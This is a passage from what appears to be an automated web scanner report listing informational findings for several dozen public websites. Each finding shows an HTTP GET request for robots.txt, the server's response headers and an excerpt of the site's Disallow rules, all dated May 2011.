GET /robots.txt HTTP/1.0
Host: www.thebullyhouse.net

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2011 10:43:59 GMT
Content-Length: 25
Content-Type: text/plain
Last-Modified: Tue, 26 Apr 2011 00:03:18 GMT
Accept-Ranges: bytes
ETag: "5fca3059a53cc1:ca23"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

User-agent: *
Disallow:

26.1003. http://www.thechildrenswearoutlet.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.thechildrenswearoutlet.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thechildrenswearoutlet.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:35:14 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Thu, 14 Apr 2011 13:25:38 GMT
ETag: "53a82e6-128-4a0e0dc6b9880"
Accept-Ranges: bytes
Content-Length: 296
Connection: close
Content-Type: text/plain

User-agent: googlebot
Disallow:
User-agent: *
Disallow: /images/thumbnails/
Disallow: /skins/
Disallow: /payments/
Disallow: /store_closed.html
Disallow: /core/
Disallow: /lib/
Disallow: /insta
...[SNIP]...

26.1004. http://www.thecitizen.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.thecitizen.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thecitizen.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:18:46 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sun, 15 Aug 2010 08:53:47 GMT
ETag: "2deec32-694-48dd8da9cbcc0"
Accept-Ranges: bytes
Content-Length: 1684
Cache-Control: max-age=1209600
Expires: Tue, 17 May 2011 10:18:46 GMT
Connection: close
Content-Type: text/plain; charset=utf-8

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

26.1005. http://www.thecompassstore.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.thecompassstore.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thecompassstore.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:30:43 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Cache-Control: max-age=3600, private
Expires: Tue, 03 May 2011 11:30:43 GMT
Last-Modified: Tue, 19 Apr 2011 09:47:52 GMT
Accept-Ranges: bytes
Content-Length: 344
Connection: close
Content-Type: text/plain

User-agent: *
# Cap is html
Disallow: /cgi-bin/
Disallow: /RT/
Disallow: /TG/
Disallow: /QS/
Disallow: /wgl/
Disallow: /P/
Disallow: /ymix/
Disallow: /OS/
Disallow: /cs/
Disallow: /en=
Disallow: /p/s=
...[SNIP]...

26.1006. http://www.thefashionpolice.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.thefashionpolice.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thefashionpolice.net

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:32:40 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Fri, 20 Aug 2010 14:47:17 GMT
ETag: "a59a06-5d6-60088740"
Accept-Ranges: bytes
Content-Length: 1494
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /cgi-bin
Disallow: /wp-admin
Disallow: /wp-includes
Disallow: /wp-content/plugins
Disallow: /wp-content/cache
Disallow: /wp-content/themes
Disallow: /2010/03/katie-holme
...[SNIP]...

26.1007. http://www.thefirestore.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.thefirestore.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thefirestore.com

Response

HTTP/1.1 200 OK
Content-Length: 107
Content-Type: text/plain
Content-Location: http://www.thefirestore.com/robots.txt
Last-Modified: Wed, 27 Oct 2010 13:21:24 GMT
Accept-Ranges: bytes
ETag: "338983dad975cb1:497"
Server: Microsoft-IIS/6.0
Date: Tue, 03 May 2011 10:15:48 GMT
Connection: close

User-agent: *
Allow: /
Disallow: /AR-15Disallow: /store/category.cfm/cid_99523_thefirestore_rollback_faq/

26.1008. http://www.thefreeinmatelocator.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.thefreeinmatelocator.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thefreeinmatelocator.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:36:06 GMT
Server: Apache
Cache-Control: no-cache, no-store
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

Sitemap: http://www.thefreeinmatelocator.com/rhAmU2Xp.xml

User-agent: Googlebot
Disallow: /dyn/
Disallow: /objects/
Crawl-delay: 30

User-agent: bingbot
Disallow: /cgi-bin/
Disallow: /bin/
Disallow:
...[SNIP]...

26.1009. http://www.theinternettoday.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.theinternettoday.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.theinternettoday.net

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:11:43 GMT
Server: Apache
X-Pingback: http://theinternettoday.net/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

26.1010. http://www.theknackkids.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.theknackkids.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.theknackkids.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:25:06 GMT
Server: Apache
Content-Length: 77
Cache-Control: public;max-age=86400
Expires: Wed, 04 May 2011 10:25:06 GMT
Last-Modified: Tue, 03 May 2011 10:25:06 GMT
Vary: Accept-Encoding
Accept-Ranges: bytes
Connection: close
Content-Type: text/plain

User-Agent: *
Allow: /

Sitemap: http://www.michaels.com/sitemap_index.xml

26.1011. http://www.thelaughtermovie.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.thelaughtermovie.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thelaughtermovie.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:37:45 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 01 Mar 2011 16:30:42 GMT
ETag: "1888439-63f-49d6e5140b080"
Accept-Ranges: bytes
Content-Length: 1599
Connection: close
Content-Type: text/plain; charset=utf-8

# $Id: robots.txt,v 1.9.2.2 2010/09/06 10:37:16 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

26.1012. http://www.themanschoice.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.themanschoice.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.themanschoice.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:28:04 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 22 Jan 2010 08:30:02 GMT
ETag: "1bb010f-193-a0351680"
Accept-Ranges: bytes
Content-Length: 403
Connection: close
Content-Type: text/plain

User-Agent: *
Allow: /

Disallow: /eScripts/
Disallow: /content/
Disallow: /WPB/
Disallow: /ArcticEssentials.html
Disallow: /Fortex.html
Disallow: /Vialipro.html
Disallow: /Cholesterclear.html
Di
...[SNIP]...

26.1013. http://www.theoldschoolhousestore.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.theoldschoolhousestore.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.theoldschoolhousestore.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:48:41 GMT
Server: Apache
Last-Modified: Thu, 29 Apr 2010 13:53:14 GMT
ETag: "29c8049-52-4856072aae680"
Accept-Ranges: bytes
Content-Length: 82
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /retailers
Disallow: /
Disallow: /DownloadnGo/deactivated/

26.1014. http://www.therapeuticresearch.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.therapeuticresearch.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.therapeuticresearch.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 24 Nov 2010 20:01:16 GMT
Accept-Ranges: bytes
ETag: "3c4d825a128ccb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:33:22 GMT
Connection: close
Content-Length: 931

User-agent: *
Disallow: /AccessAgreement.aspx
Disallow: /ChangeProfile.aspx
Disallow: /ColleaguesInteract.aspx
Disallow: /CustomAuth.aspx
Disallow: /Error_Display.aspx
Disallow: /grouplogon.aspx
...[SNIP]...

26.1015. http://www.therealfun.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.therealfun.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.therealfun.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:41:45 GMT
Server: Apache
Last-Modified: Thu, 24 Feb 2011 16:31:33 GMT
Accept-Ranges: bytes
Content-Length: 42
Connection: close
Content-Type: text/plain

User-Agent: *
Allow: /
Disallow: /cgi-bin

26.1016. http://www.thereareplaces.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.thereareplaces.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thereareplaces.com

Response

HTTP/1.1 200 OK
Content-Length: 481
Content-Type: text/plain
Content-Location: http://www.thereareplaces.com/robots.txt
Last-Modified: Thu, 03 Mar 2011 18:28:20 GMT
Accept-Ranges: bytes
ETag: "ea19e7c5d0d9cb1:493"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:24:04 GMT
Connection: close

User-agent: *
Disallow: /fon/ # May disappear
Disallow: /searchrslts.htm # files for interal website search
Disallow: /tips/ # will soon disappear
Disallow: /infgdes/Tips/ # will soon disappear

...[SNIP]...

26.1017. http://www.therumpus.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.therumpus.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.therumpus.net

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:28:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://therumpus.net/wordpress/xmlrpc.php
Set-Cookie: PHPSESSID=0036a3ee036f5ddc6e4567ba3e01b00c; path=/
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/wordpress/
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

26.1018. http://www.thewitcher.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.thewitcher.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thewitcher.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:12:08 GMT
Server: Apache
Last-Modified: Wed, 06 Jan 2010 12:41:32 GMT
ETag: "1fd8864-1a-47c7e462e3700"
Accept-Ranges: bytes
Content-Length: 26
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

#User-agent: *
#Disallow:

26.1019. http://www.thinkfashion.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.thinkfashion.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thinkfashion.com

Response

HTTP/1.1 200 OK
Content-Length: 1129
Content-Type: text/plain
Last-Modified: Tue, 19 Jan 2010 16:16:13 GMT
Accept-Ranges: bytes
ETag: "e67470b82299ca1:35c"
Server: Microsoft-IIS/6.0
Server-Name: MIS-WEB20f
P3P: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:42:10 GMT
Connection: close
Set-Cookie: BIGipServerMIS-WEB20-5=167918602.20480.0000; path=/
Vary: Accept-Encoding

User-Agent: YahooYSMcm
Allow: /

User-agent: *
Disallow: /about.aspx
Disallow: /copyright.aspx
Disallow: /link-to-us.aspx
Disallow: /privacy-policy.aspx
Disallow: /jeans2.aspx
Disallow: /ppc/
...[SNIP]...

26.1020. http://www.thomann.de/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.thomann.de
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thomann.de

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:35:55 GMT
Server: Apache/2.2.17
Last-Modified: Wed, 17 Nov 2010 08:25:28 GMT
ETag: "230-4953b6a6d4e00"
Accept-Ranges: bytes
Content-Length: 560
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /warenkorb.html
Disallow: /iw_sb.html
Disallow: /thoiw4
Disallow: /pics/sbr/
Disallow: /pics/dig/
Disallow: /*/classified_show
Disallow: /*/basket_add.html
Disallow: /*/basket_
...[SNIP]...

26.1021. http://www.ticalc.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ticalc.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ticalc.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:25:14 GMT
Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g
Last-Modified: Fri, 02 Jan 2009 18:32:20 GMT
ETag: "1a42b9-95-45f84294bd500"
Accept-Ranges: bytes
Content-Length: 149
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

# robots.txt for ticalc.org
User-agent: *
Disallow: /cgi-bin
Disallow: /includes
Disallow: /pub/text/logs
Disallow: /about/oldticalc/misc/zshell.txt

26.1022. http://www.ticketleap.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ticketleap.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ticketleap.net

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 09 Nov 2010 14:35:54 GMT
Accept-Ranges: bytes
ETag: "7c12d6a1b80cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: .ticketleap.net=KJLU6Z9JMvGQ3HrGNa2-ubCiMGBarzTTn-E0a4I_q1UPxr_Pdbln4Ys3eKd9NL1D1sBcJ8gdXbLfb_c5qiRDJ0gU5i8YZ9uFV-iwD-0Nl4gKKNUoRl6k4qZ_F9511PMywKsLOz0gZ4YtGMgh3E05jFoAEJY1; domain=.ticketleap.net; expires=Tue, 03-May-2011 11:26:28 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
TL-Server: 2
Date: Tue, 03 May 2011 10:56:27 GMT
Connection: close
Content-Length: 109

User-agent: *
# list folders robots are not allowed to index
Disallow: /changesite.aspx
Disallow: /error.apx

26.1023. http://www.ticketstub.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ticketstub.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ticketstub.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:13:26 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a PHP/4.4.6 mod_ssl/2.8.31 OpenSSL/0.9.7e
Cache-Control: max-age=604800
Expires: Tue, 10 May 2011 11:13:26 GMT
Last-Modified: Fri, 28 May 2010 12:50:57 GMT
ETag: "4b8a2b-45-4bffbc31"
Accept-Ranges: bytes
Content-Length: 69
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /
Sitemap: http://www.ticketstub.com/sitemap.xml

26.1024. http://www.time-to-run.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.time-to-run.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.time-to-run.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:55:21 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 17 Mar 2011 08:50:31 GMT
ETag: "300066b6-f9a-49ea9c0f843c0"
Accept-Ranges: bytes
Content-Length: 3994
Connection: close
Content-Type: text/plain
X-Pad: avoid browser bug

User-agent: TurnitinBot
Disallow: /
User-agent: Black Hole
Disallow: /
User-agent: Titan
Disallow: /
User-agent: WebStripper
Disallow: /
User-agent: NetMechanic
Disallow: /
User-agent: Cherr
...[SNIP]...

26.1025. http://www.tireteam.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tireteam.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tireteam.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:37:02 GMT
Server: Apache/2.2.8 (Ubuntu) mod_ssl/2.2.8 OpenSSL/0.9.8g
Last-Modified: Fri, 31 Jul 2009 17:34:01 GMT
Accept-Ranges: bytes
Content-Length: 450
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /tmp/
Disallow: /Images/
Disallow: /search/
Disallow: /Resources/
Disallow: /shipping_quote
Disallow: /account_home
Disallow: /account_register
Disallow: /account_reviews
Disal
...[SNIP]...

26.1026. http://www.tnsos.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tnsos.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tnsos.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:17:28 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Tue, 24 Aug 2010 14:16:37 GMT
ETag: "4930004-116-48e9269b9db40"
Accept-Ranges: bytes
Content-Length: 278
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /tntel/LessonPlans/
Disallow: /tntel/TrainingRequests/
Disallow: /OpenAppointments/Admin/
Disallow: /Press/Admin/
Disallow: /elections/Results/Admin/
Disallow: /ExecutiveOffice
...[SNIP]...

26.1027. http://www.tomthumb.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tomthumb.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tomthumb.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Tue, 10 Aug 2010 23:28:36 GMT
ETag: "65-42-7dfe7100"
Content-Type: text/plain
Date: Tue, 03 May 2011 10:20:06 GMT
Content-Length: 66
Connection: close

User-agent: *
Disallow: /justforu
Disallow: /IFL/Grocery/justforu

26.1028. http://www.topendsports.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.topendsports.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.topendsports.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:13:11 GMT
Content-Type: text/plain
Connection: close
Server: Apache/Nginx/Varnish
Last-Modified: Mon, 04 Apr 2011 04:19:30 GMT
ETag: "e9f3ee-177-4a01010ede0fa"
Cache-Control: max-age=14400, public
Expires: Tue, 03 May 2011 12:15:26 GMT
Content-Length: 375
Accept-Ranges: bytes
Age: 10665

User-agent: *
Disallow: /image/albums/
Disallow: /image/themes/
Disallow: /image/zp-core/
Disallow: /image/zp-data/
Disallow: /image/page/search/
Disallow: /image/uploaded/
Disallow: /image/rss.php
Di
...[SNIP]...

26.1029. http://www.torontolife.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.torontolife.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.torontolife.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.35
Date: Tue, 03 May 2011 11:31:37 GMT
Content-Type: text/plain
Connection: close
Expires: Tue, 03 May 2011 11:41:37 GMT
Vary: Accept-Encoding,Cookie
ETag: 44dbd8f01519a9f1e506e3afe8d02796
Cache-Control: max-age=600
Last-Modified: Tue, 03 May 2011 11:31:37 GMT

User-agent: *
Disallow: /shopping_search/
Disallow: /wine_search/
Disallow: /restaurant_search/
Disallow: /event_search/
Disallow: /barclub_search/
Disallow: /search/
Disallow: /tracker/
Disal
...[SNIP]...

26.1030. http://www.totalassault.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.totalassault.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.totalassault.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:22:44 GMT
Server: Apache/2.0.54 (Unix) mod_perl/1.99_09 Perl/v5.8.0 mod_ssl/2.0.54 OpenSSL/0.9.7l DAV/2 FrontPage/5.0.2.2635 PHP/4.4.0 mod_gzip/2.0.26.1a
Last-Modified: Tue, 13 Apr 2010 19:40:14 GMT
ETag: "280fdb08-22-6e2ce380"
Accept-Ranges: bytes
Content-Length: 34
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /players/

26.1031. http://www.totalinjury.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.totalinjury.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.totalinjury.com

Response

HTTP/1.1 200 OK
Content-Length: 573
Content-Type: text/plain
Content-Location: http://www.totalinjury.com/robots.txt
Last-Modified: Tue, 21 Sep 2010 19:27:20 GMT
Accept-Ranges: bytes
ETag: "1eb6322c359cb1:1e22"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:34:01 GMT
Connection: close

User-agent: *
Disallow: /App_Code/
Disallow: /AssetManagement/
Disallow: /assets/
Disallow: /bin/
Disallow: /controls-infra/
Disallow: /images-infra/
Disallow: /pc/
Disallow: /PrivateAssets/
...[SNIP]...

26.1032. http://www.totallymoney.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.totallymoney.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.totallymoney.com

Response

HTTP/1.1 200 OK
Content-Length: 1334
Content-Type: text/plain
Last-Modified: Mon, 13 Dec 2010 15:51:43 GMT
Accept-Ranges: bytes
ETag: "b86d82a3dd9acb1:13d08"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:27:52 GMT
Connection: close

User-agent: *
Disallow: /Templates/
Disallow: /landing/
Disallow: /mortgage/
Disallow: /credit-cards/?csrc=220&tbl=badcredit
Disallow: /credit-cards/credit-card-splash.aspx?csrc=20&ccid=82
Disa
...[SNIP]...

26.1033. http://www.toviaz.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.toviaz.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.toviaz.com

Response

HTTP/1.1 200 OK
Content-Length: 238
Content-Type: text/plain
Last-Modified: Wed, 23 Mar 2011 17:50:58 GMT
Accept-Ranges: bytes
ETag: "32eab6dd82e9cb1:313"
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:49:45 GMT
Connection: close

User-agent: *
Disallow: /App_Data/
Disallow: /Bin
Disallow: /config
Disallow: /content
Disallow: /js
Disallow: /MailTemplate
Disallow: /siterecruit
Disallow: /styles
Disallow: /templates
Dis
...[SNIP]...

26.1034. http://www.trackemtigers.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.trackemtigers.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.trackemtigers.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:20:53 GMT
Server: Apache
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa CONi OUR IND PHY ONL UNI COM NAV INT CNT STA"
Cache-Control: private, max-age=0, must-revalidate
Last-Modified: Tue, 15 Mar 2011 11:45:39 GMT
ETag: "61bd5-d0-49e83f7a3149b"
Accept-Ranges: bytes
Content-Length: 208
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file

User-agent: *
Disallow: /admin
Disallow: /newfanshot
Disallow: /search
Disallow: /account
Disallow:
...[SNIP]...

26.1035. http://www.trade-schools.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.trade-schools.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.trade-schools.net

Response

HTTP/1.1 200 OK
Set-Cookie:WEBTRENDS_ID=173.193.214.243-1818630848.30148987; expires=Wed, 02-May-2012 10:18:19 GMT; path=/
Set-Cookie:WEBTRENDS_ID=173.193.214.243-1818630848.30148987; expires=Wed, 02-May-2012 10:18:19 GMT; path=/
Connection: close
Date: Tue, 03 May 2011 10:18:19 GMT
Content-Length: 259
Content-Type: text/plain
Last-Modified: Thu, 24 Mar 2011 17:22:58 GMT
Accept-Ranges: bytes
ETag: "d287fa1e48eacb1:39c"
Server: Microsoft-IIS/6.0

User-agent: *
Disallow: /hcpi/
Disallow: /blog/Account/
Disallow: /blog/search.aspx
Disallow: /blog/error404.aspx
Disallow: /blog/archive.aspx
Disallow: /blog/?tag=/
Disallow: /blog/category/

...[SNIP]...

26.1036. http://www.trade2win.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.trade2win.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.trade2win.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:45:11 GMT
Server: Apache
Last-Modified: Thu, 11 Feb 2010 12:18:00 GMT
Accept-Ranges: bytes
Content-Length: 1306
Vary: Accept-Encoding
SFARM: panna
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /boards/ajax.php
Disallow: /boards/attachment.php
Disallow: /boards/cron.php
Disallow: /boards/editpost.php
Disallow: /boards/global.php
Disallow: /boards/image.php
Disallow: /
...[SNIP]...

26.1037. http://www.tradearca.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tradearca.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tradearca.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:32:42 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Mon, 08 May 2006 18:56:18 GMT
ETag: "bacc2417d172c61:da2"
Content-Length: 232

User-Agent: *
Disallow: 404.asp
Disallow: /arca_data/
Disallow: /auctiondemo/
Disallow: /data_feeds/
Disallow: /global.asa
Disallow: /images/
Disallow: /include/
Disallow: /issuers/bin/
Disallow: /iss
...[SNIP]...

26.1038. http://www.trailways.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.trailways.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.trailways.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:10:12 GMT
Server: Apache
Last-Modified: Tue, 26 Apr 2011 05:27:46 GMT
Accept-Ranges: bytes
Content-Length: 1540
Cache-Control: max-age=1209600
